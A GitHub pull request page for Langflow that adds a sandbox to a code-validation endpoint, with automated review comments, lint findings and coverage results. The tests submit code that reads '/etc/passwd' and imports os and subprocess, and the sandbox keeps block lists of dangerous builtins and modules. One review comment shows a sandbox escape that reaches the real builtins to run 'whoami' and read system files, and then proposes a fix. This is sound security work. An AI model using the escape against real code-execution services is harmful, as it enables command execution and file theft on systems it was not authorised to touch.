-
Notifications
You must be signed in to change notification settings - Fork 8.2k
ref: add sandbox to exec call in validate endpoint #10696
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
base: main
Are you sure you want to change the base?
Conversation
WalkthroughThis PR introduces a security sandbox for isolated Python code execution that blocks dangerous operations and modules by default, adds IBM watsonx.ai embedding model support with provider-specific configuration, and includes comprehensive security and integration tests. A new global setting controls whether dangerous code operations are permitted during validation. Changes
Sequence Diagram(s)sequenceDiagram
participant User as User Code
participant Val as validate.py
participant Sand as sandbox.py
participant Builtins as Isolated Builtins
participant Imports as Isolated Imports
User->>Val: compile code snippet
Val->>Val: create exec_globals
Val->>Sand: execute_in_sandbox(code_obj, exec_globals)
Sand->>Builtins: create_isolated_builtins()
Sand->>Imports: create_isolated_import()
note over Sand: Prepare isolated environment
Sand->>Sand: merge safe exec_globals
Sand->>Sand: set __builtins__ to isolated
Sand->>Sand: set __name__ and other attrs
rect rgba(255, 200, 0, 0.2)
note over Sand: Execute compiled code with isolation
Sand->>User: exec(code_obj, isolated_globals)
end
alt Code attempts dangerous operation
Builtins-->>Sand: raise SecurityViolation
Sand-->>Val: SecurityViolation caught
Val-->>User: validation fails
else Code is safe
User->>Imports: import langflow
Imports-->>User: allowed (in safe list)
Sand-->>Val: execution completes
Val-->>User: validation succeeds
end
sequenceDiagram
participant Client as Client Request
participant API as /api/v1/validate/code
participant Handler as Validation Handler
participant Sandbox as Sandbox Executor
participant Config as Settings
Client->>API: POST user_code
API->>Config: check allow_dangerous_code_validation
rect rgba(100, 200, 100, 0.2)
note over Config: Default: False (block dangerous)
end
API->>Handler: validate(code, dangerous_allowed=False)
Handler->>Handler: parse AST
Handler->>Sandbox: execute imports in sandbox
Handler->>Sandbox: execute functions in sandbox
alt Dangerous operation detected
rect rgba(255, 100, 100, 0.2)
Sandbox-->>Handler: SecurityViolation
Handler-->>API: 422 validation error
end
else Safe code
rect rgba(100, 200, 100, 0.2)
Sandbox-->>Handler: execution succeeds
Handler-->>API: 200 validation passed
end
end
API-->>Client: response
Estimated code review effort🎯 4 (Complex) | ⏱️ ~50 minutes Areas requiring extra attention:
Possibly related PRs
Suggested labels
Suggested reviewers
Pre-merge checks and finishing touchesImportant Pre-merge checks failedPlease resolve all errors before merging. Addressing warnings is optional. ❌ Failed checks (1 error, 2 warnings)
✅ Passed checks (4 passed)
✨ Finishing touches
🧪 Generate unit tests (beta)
Thanks for using CodeRabbit! It's free for OSS, and your support helps us grow. If you like it, consider giving us a shout-out. Comment |
Codecov Report✅ All modified and coverable lines are covered by tests. Additional details and impacted files@@ Coverage Diff @@
## main #10696 +/- ##
==========================================
- Coverage 31.66% 31.23% -0.44%
==========================================
Files 1350 1350
Lines 61163 61161 -2
Branches 9142 9142
==========================================
- Hits 19368 19102 -266
- Misses 40879 41143 +264
Partials 916 916
Flags with carried forward coverage won't be shown. Click here to find out more.
🚀 New features to boost your workflow:
|
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Actionable comments posted: 9
🧹 Nitpick comments (2)
src/lfx/src/lfx/custom/validate.py (1)
74-85: Function definition now executed in sandbox — verify expectations for decorator/default‑arg errorsExecuting each
FunctionDefviaexecute_in_sandboxwith_create_langflow_execution_context()is a good way to catch definition‑time errors (decorators, default args, annotations) without exposing server state. Just be aware this will also surfaceSecurityViolation(e.g., if decorators/imports inside the function hit blocked modules) through the genericexcept Exceptionpath and report them asfunction["errors"]. Confirm that this mapping and logging ("Error executing function code") matches what the validate API and UI expect for blocked operations vs regular runtime errors.src/backend/tests/unit/api/v1/test_validate.py (1)
183-209: Clean up W293 blank lines in docstrings for third‑party‑libs test.Ruff reports
W293 Blank line contains whitespaceat line 184. That’s the empty line inside this docstring:"""Test that third-party libraries (not in a whitelist) can be imported. Users should be able to import legitimate third-party libraries like AI libraries, ... """You can fix it by removing the blank line or making it non‑blank:
- """Test that third-party libraries (not in a whitelist) can be imported. - - Users should be able to import legitimate third-party libraries like AI libraries, + """Test that third-party libraries (not in a whitelist) can be imported. + Users should be able to import legitimate third-party libraries like AI libraries,Same pattern applies to the docstrings around Lines 252 and 280; see next comment.
📜 Review details
Configuration used: Path: .coderabbit.yaml
Review profile: CHILL
Plan: Pro
⛔ Files ignored due to path filters (1)
uv.lockis excluded by!**/*.lock
📒 Files selected for processing (7)
src/backend/tests/unit/api/v1/test_validate.py(1 hunks)src/backend/tests/unit/utils/test_validate.py(1 hunks)src/lfx/src/lfx/custom/sandbox.py(1 hunks)src/lfx/src/lfx/custom/validate.py(2 hunks)src/lfx/src/lfx/services/settings/base.py(1 hunks)src/lfx/tests/unit/custom/test_sandbox_isolation.py(1 hunks)src/lfx/tests/unit/custom/test_sandbox_security.py(1 hunks)
🧰 Additional context used
🧬 Code graph analysis (5)
src/lfx/src/lfx/custom/validate.py (1)
src/lfx/src/lfx/custom/sandbox.py (3)
create_isolated_import(140-173)execute_in_sandbox(176-239)isolated_import(149-171)
src/lfx/src/lfx/custom/sandbox.py (1)
src/backend/base/langflow/interface/importing/utils.py (1)
import_module(7-32)
src/lfx/tests/unit/custom/test_sandbox_isolation.py (1)
src/lfx/src/lfx/custom/sandbox.py (1)
execute_in_sandbox(176-239)
src/lfx/tests/unit/custom/test_sandbox_security.py (1)
src/lfx/src/lfx/custom/sandbox.py (1)
execute_in_sandbox(176-239)
src/backend/tests/unit/api/v1/test_validate.py (1)
src/backend/tests/conftest.py (1)
logged_in_headers(507-513)
🪛 GitHub Actions: Ruff Style Check
src/backend/tests/unit/api/v1/test_validate.py
[error] 101-101: Ruff: E501 Line too long (131 > 120). Line exceeds maximum line length.
🪛 GitHub Check: Ruff Style Check (3.13)
src/lfx/src/lfx/custom/sandbox.py
[failure] 16-16: Ruff (N818)
src/lfx/src/lfx/custom/sandbox.py:16:7: N818 Exception name SecurityViolation should be named with an Error suffix
[failure] 13-13: Ruff (UP035)
src/lfx/src/lfx/custom/sandbox.py:13:1: UP035 typing.Set is deprecated, use set instead
[failure] 13-13: Ruff (UP035)
src/lfx/src/lfx/custom/sandbox.py:13:1: UP035 typing.Dict is deprecated, use dict instead
src/backend/tests/unit/api/v1/test_validate.py
[failure] 280-280: Ruff (W293)
src/backend/tests/unit/api/v1/test_validate.py:280:1: W293 Blank line contains whitespace
[failure] 268-268: Ruff (E501)
src/backend/tests/unit/api/v1/test_validate.py:268:121: E501 Line too long (127 > 120)
[failure] 252-252: Ruff (W293)
src/backend/tests/unit/api/v1/test_validate.py:252:1: W293 Blank line contains whitespace
[failure] 184-184: Ruff (W293)
src/backend/tests/unit/api/v1/test_validate.py:184:1: W293 Blank line contains whitespace
[failure] 134-134: Ruff (F841)
src/backend/tests/unit/api/v1/test_validate.py:134:5: F841 Local variable result is assigned to but never used
[failure] 133-133: Ruff (E501)
src/backend/tests/unit/api/v1/test_validate.py:133:121: E501 Line too long (121 > 120)
[failure] 101-101: Ruff (E501)
src/backend/tests/unit/api/v1/test_validate.py:101:121: E501 Line too long (131 > 120)
🪛 Gitleaks (8.29.0)
src/lfx/tests/unit/custom/test_sandbox_security.py
[high] 30-30: Detected a Generic API Key, potentially exposing access to various services and sensitive operations.
(generic-api-key)
[high] 66-66: Detected a Generic API Key, potentially exposing access to various services and sensitive operations.
(generic-api-key)
⏰ Context from checks skipped due to timeout of 90000ms. You can increase the timeout in your CodeRabbit configuration to a maximum of 15 minutes (900000ms). (13)
- GitHub Check: Lint Backend / Run Mypy (3.13)
- GitHub Check: Lint Backend / Run Mypy (3.10)
- GitHub Check: Lint Backend / Run Mypy (3.11)
- GitHub Check: Lint Backend / Run Mypy (3.12)
- GitHub Check: Run Backend Tests / Unit Tests - Python 3.10 - Group 5
- GitHub Check: Run Backend Tests / Unit Tests - Python 3.10 - Group 4
- GitHub Check: Run Backend Tests / Unit Tests - Python 3.10 - Group 1
- GitHub Check: Run Backend Tests / Unit Tests - Python 3.10 - Group 2
- GitHub Check: Run Backend Tests / Unit Tests - Python 3.10 - Group 3
- GitHub Check: Run Backend Tests / Integration Tests - Python 3.10
- GitHub Check: Run Backend Tests / LFX Tests - Python 3.10
- GitHub Check: Test Starter Templates
- GitHub Check: Update Component Index
🔇 Additional comments (2)
src/backend/tests/unit/utils/test_validate.py (1)
70-76: Typed function example looks consistent with sandboxed validationUsing
from typing import List, Optionalplusjson/mathinsideprocess_dataaligns with_create_langflow_execution_context(which seedsList/Optionalintoexec_globals), so annotation evaluation and import checks should pass without introducing new edge cases.src/lfx/src/lfx/services/settings/base.py (1)
339-349: Config flag aligns with sandbox env var; verify it’s actually wired throughAdding
allow_dangerous_code_validation: bool = Falsewith theLANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATIONenv mapping is consistent with the sandbox’s documented toggle. However, the sandbox currently appears to read the env var directly, while this Settings field is not obviously used to driveALLOW_DANGEROUS_CODE. Please confirm that:
- Setting this field (or the env var) actually affects the sandbox behavior used by
/api/v1/validate/code, and- There’s no divergence between the value in
Settingsand the value the sandbox module uses at import time.
| assert response.status_code == status.HTTP_200_OK | ||
| # Should have errors - dangerous imports are blocked | ||
| assert len(result["imports"]["errors"]) > 0 or len(result["function"]["errors"]) > 0 | ||
| # Should mention that module is blocked | ||
| all_errors = result["imports"]["errors"] + result["function"]["errors"] | ||
| assert any("blocked" in str(err).lower() or "os" in str(err).lower() or "subprocess" in str(err).lower() for err in all_errors) | ||
|
|
||
|
|
||
| @pytest.mark.usefixtures("active_user") | ||
| async def test_validate_code_blocks_dangerous_builtins_by_default(client: AsyncClient, logged_in_headers): | ||
| """Test that dangerous builtins are blocked by default.""" | ||
| # Code using dangerous builtins in default args should be blocked | ||
| # (function-definition-time execution catches this) | ||
| dangerous_code = """ | ||
| def test(x=open('/etc/passwd', 'r').read()): | ||
| return x | ||
| """ | ||
| response = await client.post("api/v1/validate/code", json={"code": dangerous_code}, headers=logged_in_headers) | ||
| result = response.json() | ||
| assert response.status_code == status.HTTP_200_OK | ||
| # Should have errors - dangerous builtins are blocked | ||
| assert len(result["function"]["errors"]) > 0 | ||
| # Should mention that builtin is blocked | ||
| assert any("blocked" in str(err).lower() or "open" in str(err).lower() for err in result["function"]["errors"]) | ||
|
|
||
|
|
||
| @pytest.mark.usefixtures("active_user") | ||
| async def test_validate_code_cannot_access_server_globals(client: AsyncClient, logged_in_headers): | ||
| """Test that code cannot access server's global namespace.""" | ||
| # Try to access something that would be in server globals | ||
| code_trying_to_escape = """ | ||
| def test(): | ||
| # Try to access parent frame or server globals | ||
| import sys | ||
| # This should execute but in isolation - can't access server's sys module state | ||
| return sys.version | ||
| """ | ||
| response = await client.post("api/v1/validate/code", json={"code": code_trying_to_escape}, headers=logged_in_headers) | ||
| result = response.json() | ||
| assert response.status_code == status.HTTP_200_OK | ||
| # Code executes but in isolation - sys is imported fresh, not server's sys | ||
|
|
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Fix Ruff E501 / F841 in dangerous‑imports and server‑globals tests.
Ruff is (correctly) flagging:
- Line 101: E501 line too long.
- Line 133: E501 line too long.
- Line 134: F841
resultis assigned but never used.
You can resolve all three without changing test semantics:
@@ async def test_validate_code_blocks_dangerous_imports_by_default(client: AsyncClient, logged_in_headers):
- all_errors = result["imports"]["errors"] + result["function"]["errors"]
- assert any("blocked" in str(err).lower() or "os" in str(err).lower() or "subprocess" in str(err).lower() for err in all_errors)
+ all_errors = result["imports"]["errors"] + result["function"]["errors"]
+ assert any(
+ "blocked" in str(err).lower()
+ or "os" in str(err).lower()
+ or "subprocess" in str(err).lower()
+ for err in all_errors
+ )
@@ async def test_validate_code_cannot_access_server_globals(client: AsyncClient, logged_in_headers):
- response = await client.post("api/v1/validate/code", json={"code": code_trying_to_escape}, headers=logged_in_headers)
- result = response.json()
+ response = await client.post(
+ "api/v1/validate/code",
+ json={"code": code_trying_to_escape},
+ headers=logged_in_headers,
+ )
@@
- assert response.status_code == status.HTTP_200_OK
- # Code executes but in isolation - sys is imported fresh, not server's sys
+ assert response.status_code == status.HTTP_200_OK
+ # Code executes but in isolation - sys is imported fresh, not server's sysThis keeps the intent while satisfying Ruff line‑length and unused‑variable rules. As per pipeline failures.
🧰 Tools
🪛 GitHub Actions: Ruff Style Check
[error] 101-101: Ruff: E501 Line too long (131 > 120). Line exceeds maximum line length.
🪛 GitHub Check: Ruff Style Check (3.13)
[failure] 134-134: Ruff (F841)
src/backend/tests/unit/api/v1/test_validate.py:134:5: F841 Local variable result is assigned to but never used
[failure] 133-133: Ruff (E501)
src/backend/tests/unit/api/v1/test_validate.py:133:121: E501 Line too long (121 > 120)
[failure] 101-101: Ruff (E501)
src/backend/tests/unit/api/v1/test_validate.py:101:121: E501 Line too long (131 > 120)
| @pytest.mark.usefixtures("active_user") | ||
| async def test_validate_code_allows_third_party_libraries(client: AsyncClient, logged_in_headers): | ||
| """Test that third-party libraries (not in a whitelist) can be imported. | ||
| Users should be able to import legitimate third-party libraries like AI libraries, | ||
| data processing libraries, etc. We only block dangerous system-level modules. | ||
| """ | ||
| # Try importing a common third-party library that wouldn't be in a whitelist | ||
| # Using 'requests' as an example - it's a legitimate library but not dangerous | ||
| # Note: This test will fail if 'requests' isn't installed, but that's okay | ||
| # The important thing is that if it IS installed, it should be allowed | ||
| third_party_code = """ | ||
| try: | ||
| import requests | ||
| HAS_REQUESTS = True | ||
| except ImportError: | ||
| HAS_REQUESTS = False | ||
| def test(): | ||
| return HAS_REQUESTS | ||
| """ | ||
| response = await client.post("api/v1/validate/code", json={"code": third_party_code}, headers=logged_in_headers) | ||
| result = response.json() | ||
| assert response.status_code == status.HTTP_200_OK | ||
| # Should execute without errors - third-party libraries are allowed | ||
| # (unless they're in BLOCKED_MODULES like 'os', 'subprocess', etc.) | ||
| assert len(result["imports"]["errors"]) == 0 | ||
| assert len(result["function"]["errors"]) == 0 | ||
|
|
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
🧩 Analysis chain
Third‑party library test conflicts with sandbox BLOCKED_MODULES (requests is currently blocked).
test_validate_code_allows_third_party_libraries assumes that importing requests is allowed and that validation returns no errors:
# Using 'requests' as an example - it's a legitimate library but not dangerous
...
assert len(result["imports"]["errors"]) == 0
assert len(result["function"]["errors"]) == 0However, the sandbox’s BLOCKED_MODULES set explicitly includes "requests" (and "httpx"), treating network access as dangerous. With the current sandbox, this test will fail because the import will raise a SecurityViolation, not an ImportError, and you’ll see validation errors.
You should align test expectations with the sandbox policy in one of these ways:
- Option A (keep
requestsblocked): change the test to use some other third‑party library that is not inBLOCKED_MODULES(e.g., a common dependency in your stack), and update the comments to clarify that HTTP clients are intentionally blocked. - Option B (allow
requestsin validation): remove"requests"(and possibly"httpx") fromBLOCKED_MODULESif you’re comfortable allowing outbound HTTP in validation, and adjust the sandbox tests accordingly.
Given the top‑level docstring in sandbox.py says that network operations are blocked by default, Option A seems more consistent with the current security model.
🏁 Script executed:
#!/bin/bash
# Double‑check the current BLOCKED_MODULES definition and where this test runs.
rg -n "BLOCKED_MODULES" -S src/lfx/src/lfx/custom/sandbox.py
rg -n "test_validate_code_allows_third_party_libraries" -SLength of output: 424
I need to inspect the actual contents of the BLOCKED_MODULES set to verify the review comment's claim. Let me gather that information:
[/run_scripts]
🏁 Script executed:
#!/bin/bash
# View the BLOCKED_MODULES set definition (lines around 42)
sed -n '42,80p' src/lfx/src/lfx/custom/sandbox.pyLength of output: 700
Now I need to verify what happens during validation when a blocked module is encountered, and confirm the test would fail as claimed:
[/run_scripts]
🏁 Script executed:
#!/bin/bash
# Check the validation logic around line 156 that checks BLOCKED_MODULES
sed -n '150,175p' src/lfx/src/lfx/custom/sandbox.pyLength of output: 1285
I need to see how the validate endpoint handles SecurityViolation exceptions and what error structure gets returned:
[/run_scripts]
🏁 Script executed:
#!/bin/bash
# Find the validate endpoint code for the /api/v1/validate/code route
rg -n "validate/code" -A 20 -B 5 src/backend/app/api/v1/Length of output: 63
Let me search more broadly for the validate endpoint implementation:
[/run_scripts]
🏁 Script executed:
#!/bin/bash
# Find the validate endpoint code by searching for the route handler
rg -n "def.*validate.*code" -A 15 src/backend/Length of output: 297840
Blocked module ("requests") in sandbox makes this test fail — update test or sandbox policy.
BLOCKED_MODULES in src/lfx/src/lfx/custom/sandbox.py explicitly contains "requests" and "httpx" (around line 42) and the import hook raises SecurityViolation for blocked modules (check around line 156). The test src/backend/tests/unit/api/v1/test_validate.py::test_validate_code_allows_third_party_libraries (lines 181–209) expects no import/function errors but will fail under the current sandbox policy.
- Option A (recommended): change the test to import a safe, non‑blocked third‑party library (e.g., numpy, pydantic, pandas) and update the test comments to state HTTP clients are intentionally blocked.
- Option B: if you want validation to allow HTTP clients, remove "requests" and "httpx" from BLOCKED_MODULES and update sandbox docs/tests to reflect the policy change.
🧰 Tools
🪛 GitHub Check: Ruff Style Check (3.13)
[failure] 184-184: Ruff (W293)
src/backend/tests/unit/api/v1/test_validate.py:184:1: W293 Blank line contains whitespace
| @pytest.mark.usefixtures("active_user") | ||
| async def test_validate_code_cannot_access_real_builtins(client: AsyncClient, logged_in_headers): | ||
| """Test that code cannot escape via real __builtins__. | ||
| If isolation were broken, code could access the real __builtins__ to escape. | ||
| We test this by trying to access __builtins__ directly (which should be isolated). | ||
| """ | ||
| # Try to access __builtins__ directly - if isolation is broken, this would work | ||
| code_trying_builtins_escape = """ | ||
| def test(): | ||
| # Try to access __builtins__ directly from globals | ||
| # If isolation is broken, this would give us the real builtins | ||
| try: | ||
| real_builtins = globals().get('__builtins__') | ||
| # If we got real builtins, we could escape - but we should get isolated version | ||
| return type(real_builtins).__name__ | ||
| except Exception: | ||
| return 'isolated' | ||
| """ | ||
| response = await client.post("api/v1/validate/code", json={"code": code_trying_builtins_escape}, headers=logged_in_headers) | ||
| result = response.json() | ||
| assert response.status_code == status.HTTP_200_OK | ||
| # Code should execute successfully - the key is that __builtins__ is isolated | ||
| # We can't easily verify it's isolated via API, but execution without errors | ||
| # combined with other isolation tests proves it works | ||
| assert len(result["function"]["errors"]) == 0 # Should execute without errors | ||
|
|
||
|
|
||
| @pytest.mark.usefixtures("active_user") | ||
| async def test_validate_code_uses_isolated_sandbox(client: AsyncClient, logged_in_headers): | ||
| """Test that validate endpoint uses isolated sandbox. | ||
| This test verifies that code executes in sandbox (doesn't crash). | ||
| Actual isolation behavior is tested in sandbox unit tests. | ||
| """ | ||
| # Code that sets variables - should execute without errors | ||
| # (Isolation is verified in sandbox unit tests) | ||
| code_with_variables = """ | ||
| MY_VAR = "test" | ||
| def test(): | ||
| return MY_VAR | ||
| """ | ||
| response = await client.post("api/v1/validate/code", json={"code": code_with_variables}, headers=logged_in_headers) |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Fix remaining Ruff W293 / E501 issues in builtins and sandbox‑usage tests.
Ruff flags:
- W293 at lines 252 and 280: blank lines with whitespace in docstrings.
- E501 at line 268:
client.post(...)line too long.
You can resolve them with small formatting changes:
@@ async def test_validate_code_cannot_access_real_builtins(client: AsyncClient, logged_in_headers):
- """Test that code cannot escape via real __builtins__.
-
- If isolation were broken, code could access the real __builtins__ to escape.
+ """Test that code cannot escape via real __builtins__.
+ If isolation were broken, code could access the real __builtins__ to escape.
@@
- response = await client.post("api/v1/validate/code", json={"code": code_trying_builtins_escape}, headers=logged_in_headers)
+ response = await client.post(
+ "api/v1/validate/code",
+ json={"code": code_trying_builtins_escape},
+ headers=logged_in_headers,
+ )
@@ async def test_validate_code_uses_isolated_sandbox(client: AsyncClient, logged_in_headers):
- """Test that validate endpoint uses isolated sandbox.
-
- This test verifies that code executes in sandbox (doesn't crash).
+ """Test that validate endpoint uses isolated sandbox.
+ This test verifies that code executes in sandbox (doesn't crash).This should clear the remaining Ruff warnings without changing test behavior.
🧰 Tools
🪛 GitHub Check: Ruff Style Check (3.13)
[failure] 280-280: Ruff (W293)
src/backend/tests/unit/api/v1/test_validate.py:280:1: W293 Blank line contains whitespace
[failure] 268-268: Ruff (E501)
src/backend/tests/unit/api/v1/test_validate.py:268:121: E501 Line too long (127 > 120)
[failure] 252-252: Ruff (W293)
src/backend/tests/unit/api/v1/test_validate.py:252:1: W293 Blank line contains whitespace
🤖 Prompt for AI Agents
In src/backend/tests/unit/api/v1/test_validate.py around lines 249 to 291, fix
Ruff W293 by removing trailing whitespace/extra blank-line characters inside the
two docstrings (near lines 252 and 280) and fix E501 on the long
client.post(...) call (around line 268) by wrapping the call across multiple
lines or assigning the URL/json to a short variable and passing it, keeping the
same arguments and behavior; make only whitespace/line-break edits so tests
remain functionally unchanged.
| import builtins | ||
| import importlib | ||
| import os | ||
| from typing import Any, Dict, Set | ||
|
|
||
|
|
||
| class SecurityViolation(Exception): | ||
| """Raised when code attempts to escape the sandbox or use blocked operations.""" | ||
|
|
||
| pass | ||
|
|
||
|
|
||
| # Check if dangerous operations are allowed via environment variable | ||
| ALLOW_DANGEROUS_CODE = os.getenv("LANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATION", "false").lower() == "true" | ||
|
|
||
| # Dangerous builtins that should be blocked by default | ||
| BLOCKED_BUILTINS: Set[str] = { | ||
| "open", # File I/O |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
🧩 Analysis chain
Align type hints with modern typing and Ruff, and consider exception naming.
Ruff is flagging Dict/Set (UP035) and the exception name (N818). You can address both with small, non‑behavioral changes:
- Use built‑in generics instead of
typing.Dict/typing.Set. - Optionally rename
SecurityViolationto follow the*Errorconvention if you want Ruff clean.
Example diff:
-import builtins
-import importlib
-import os
-from typing import Any, Dict, Set
+import builtins
+import importlib
+import os
+from typing import Any
@@
-class SecurityViolation(Exception):
+class SecurityViolation(Exception): # or `SecurityViolationError` if you want to satisfy N818
"""Raised when code attempts to escape the sandbox or use blocked operations."""
@@
-# Dangerous builtins that should be blocked by default
-BLOCKED_BUILTINS: Set[str] = {
+# Dangerous builtins that should be blocked by default
+BLOCKED_BUILTINS: set[str] = {
@@
-# Dangerous modules that should be blocked by default
-BLOCKED_MODULES: Set[str] = {
+# Dangerous modules that should be blocked by default
+BLOCKED_MODULES: set[str] = {If you do decide to rename the exception to something like SecurityViolationError, remember to update all imports/usages across the codebase and tests so they still catch the right type. As per static analysis hints.
🏁 Script executed:
#!/bin/bash
# Confirm all references to the sandbox exception are updated consistently.
rg -n "SecurityViolation" -SLength of output: 504
Wait, let me correct that - I need to search properly in the repo:
🏁 Script executed:
#!/bin/bash
# Search for all imports/references to SecurityViolation across entire codebase
rg -n "from.*sandbox.*import|import.*SecurityViolation" --type=py
rg -n "SecurityViolation" --type=py | grep -v "sandbox.py"Length of output: 319
🏁 Script executed:
#!/bin/bash
# Check if SecurityViolation is in __all__ or explicitly exported
fd -e py -exec grep -l "__all__" {} \; | head -10Length of output: 191
🏁 Script executed:
#!/bin/bash
# Search for imports of SecurityViolation from sandbox module
rg "from.*sandbox.*import.*SecurityViolation|import.*sandbox.*SecurityViolation" --type=py
# Also search for any __all__ declarations in sandbox.py
rg -A 5 "__all__" src/lfx/src/lfx/custom/sandbox.pyLength of output: 0
Type hints and exception naming are safe, localized refactoring.
Verification confirms SecurityViolation is not imported or referenced outside sandbox.py, so renaming to SecurityViolationError requires updates only within that single file (5 locations: lines 16, 128, 157, 194, 233). The Dict/Set → dict/set modernization is also straightforward and safe. Both changes align with Ruff's modern Python conventions.
🧰 Tools
🪛 GitHub Check: Ruff Style Check (3.13)
[failure] 16-16: Ruff (N818)
src/lfx/src/lfx/custom/sandbox.py:16:7: N818 Exception name SecurityViolation should be named with an Error suffix
[failure] 13-13: Ruff (UP035)
src/lfx/src/lfx/custom/sandbox.py:13:1: UP035 typing.Set is deprecated, use set instead
[failure] 13-13: Ruff (UP035)
src/lfx/src/lfx/custom/sandbox.py:13:1: UP035 typing.Dict is deprecated, use dict instead
| class IsolatedBuiltinsModule: | ||
| """Fake builtins module that prevents escaping.""" | ||
| def __getattr__(self, name: str) -> Any: | ||
| # Block dangerous builtins unless explicitly allowed | ||
| if not ALLOW_DANGEROUS_CODE and name in BLOCKED_BUILTINS: | ||
| raise SecurityViolation(f"Dangerous builtin '{name}' is blocked. Set LANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATION=true to allow.") | ||
| if name == "__builtins__": | ||
| return isolated_builtins | ||
| if hasattr(builtins, name): | ||
| return getattr(builtins, name) | ||
| raise AttributeError(f"module 'builtins' has no attribute '{name}'") | ||
|
|
||
| isolated_builtins["builtins"] = IsolatedBuiltinsModule() | ||
|
|
||
| return isolated_builtins | ||
|
|
||
|
|
||
| def create_isolated_import(): | ||
| """Create an import function that blocks dangerous modules by default. | ||
| By default, blocks dangerous modules (os, subprocess, socket, etc.). | ||
| Set LANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATION=true to allow them. | ||
| Returns: | ||
| A function that performs isolated imports | ||
| """ | ||
| def isolated_import(name: str, globals=None, locals=None, fromlist=(), level=0): # noqa: A002, ARG001 | ||
| """Import function that blocks dangerous modules by default.""" | ||
| # Extract top-level module name | ||
| module_name = name.split(".")[0] | ||
|
|
||
| # Block dangerous modules unless explicitly allowed | ||
| if not ALLOW_DANGEROUS_CODE: | ||
| if module_name in BLOCKED_MODULES: | ||
| raise SecurityViolation( | ||
| f"Dangerous module '{module_name}' is blocked. " | ||
| f"Set LANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATION=true to allow." | ||
| ) | ||
| # Allow langflow.* and lfx.* modules, and any module not in BLOCKED_MODULES | ||
| # This allows users to import legitimate third-party libraries (AI libraries, etc.) | ||
| # while still blocking dangerous system-level operations | ||
| is_lfx_module = module_name == "lfx" or module_name.startswith("lfx.") | ||
| is_langflow_module = module_name == "langflow" or module_name.startswith("langflow.") | ||
|
|
||
| # If it's not a blocked module, and not langflow/lfx, it's allowed | ||
| # (We've already checked BLOCKED_MODULES above, so anything reaching here is safe) | ||
|
|
||
| # Import the module (still isolated namespace-wise) | ||
| return importlib.import_module(name) | ||
|
|
||
| return isolated_import |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Critical sandbox escape via import builtins (real builtins and __import__ are reachable).
Inside the sandbox, user code can currently do:
import builtins as real_builtins
real_builtins.__import__("os").system("whoami")
real_builtins.open("/etc/passwd").read()Reason: create_isolated_import always delegates to importlib.import_module(name) and has no special handling for the "builtins" module. So import builtins returns the real builtins module, not the IsolatedBuiltinsModule you build in create_isolated_builtins. From there, all dangerous builtins and the real __import__ are available, bypassing both BLOCKED_BUILTINS and BLOCKED_MODULES.
This breaks the core sandbox guarantee and should be fixed before relying on this in production.
A minimal fix is to thread the isolated builtins into create_isolated_import and special‑case "builtins" so imports always see the fake module:
-import builtins
-import importlib
-import os
-from typing import Any, Dict, Set
+import builtins
+import importlib
+import os
+from typing import Any
@@
-def create_isolated_builtins() -> Dict[str, Any]:
+def create_isolated_builtins() -> dict[str, Any]:
@@
- class IsolatedBuiltinsModule:
+ class IsolatedBuiltinsModule:
"""Fake builtins module that prevents escaping."""
@@
- isolated_builtins["builtins"] = IsolatedBuiltinsModule()
+ isolated_builtins["builtins"] = IsolatedBuiltinsModule()
@@
-def create_isolated_import():
+def create_isolated_import(isolated_builtins: dict[str, Any]):
@@
- def isolated_import(name: str, globals=None, locals=None, fromlist=(), level=0): # noqa: A002, ARG001
+ def isolated_import(name: str, globals=None, locals=None, fromlist=(), level=0): # noqa: A002, ARG001
@@
- module_name = name.split(".")[0]
-
+ module_name = name.split(".")[0]
+
+ # Never expose the real `builtins` module into the sandbox.
+ # Always return the isolated fake module created in `create_isolated_builtins`.
+ if module_name == "builtins":
+ return isolated_builtins["builtins"]
+
@@
- return isolated_import
+ return isolated_import
@@
- # Create isolated builtins - prevents accessing real __builtins__
- isolated_builtins = create_isolated_builtins()
-
- # Create isolated import function
- isolated_import = create_isolated_import()
+ # Create isolated builtins - prevents accessing real __builtins__
+ isolated_builtins = create_isolated_builtins()
+
+ # Create isolated import function; it needs access to `isolated_builtins`
+ # so that `import builtins` returns the fake module, not the real one.
+ isolated_import = create_isolated_import(isolated_builtins)This ensures import builtins inside the sandbox always returns the restricted IsolatedBuiltinsModule, so attempts to reach open, __import__, etc., will hit your SecurityViolation checks instead of the real interpreter module.
| from lfx.custom.sandbox import create_isolated_import, execute_in_sandbox | ||
| from lfx.field_typing.constants import CUSTOM_COMPONENT_SUPPORTED_TYPES, DEFAULT_IMPORT_STRING |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
🧩 Analysis chain
Sandboxed import handling changes error surface for “dangerous” modules
validate_code now uses create_isolated_import() for both ast.Import and ast.ImportFrom and treats any Exception (including security violations from blocked modules) as an import error. That means code importing e.g. os/subprocess will start producing additional entries in result["imports"]["errors"], whereas previously only truly missing modules would. This is probably desirable for the validate endpoint, but it diverges from tests like test_code_with_multiple_imports which currently expect exactly two errors for nonexistent1/nonexistent2. Please double‑check the existing tests and any API consumers that depend on the old “only ModuleNotFoundError counts” behavior and update them or narrow the exception handling (e.g., distinguish SecurityViolation vs ModuleNotFoundError) as needed.
Also applies to: 51-73
I'll verify the review comment by examining the actual code and tests to understand if the sandboxing change breaks existing behavior.
🏁 Script executed:
#!/bin/bash
# Find and examine the validate.py file to understand the new import and its usage
find . -name "validate.py" -type f | grep -E "lfx|custom" | head -5Length of output: 83
🏁 Script executed:
#!/bin/bash
# Find and examine the sandbox.py file to understand exception types
